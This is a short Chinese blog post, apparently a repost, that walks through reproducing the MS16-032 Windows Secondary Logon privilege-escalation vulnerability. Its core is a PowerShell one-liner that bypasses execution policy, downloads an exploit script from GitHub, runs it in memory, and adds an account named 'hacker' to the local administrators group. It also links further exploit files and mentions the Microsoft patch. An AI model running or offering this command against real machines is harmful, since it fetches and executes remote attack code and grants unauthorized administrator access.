MS16-032 漏洞复现


exploit-db的详情:  https://www.exploit-db.com/exploits/39574/

Windows: Secondary Logon Standard Handles Missing Sanitization EoP
Platform: Windows 8.1, Windows 10, not testing on Windows 7
Class: Elevation of Privilege

 

0x01使用标准用户登陆win7,下图是当前登录用户abc的详细信息。

0x02直接执行命令进行提权,简单粗暴

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators hacker /add'"

0x03下面就是见证奇迹的时刻了

 

该漏洞危害十分严重,如图在2008server上测试

本地测试如图,被安全软件检测到。

微软官方在2016年3月8日发布了补丁KB3139914。

 

附上利用提取文件下载地址https://github.com/hexx0r/CVE-2016-0051


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM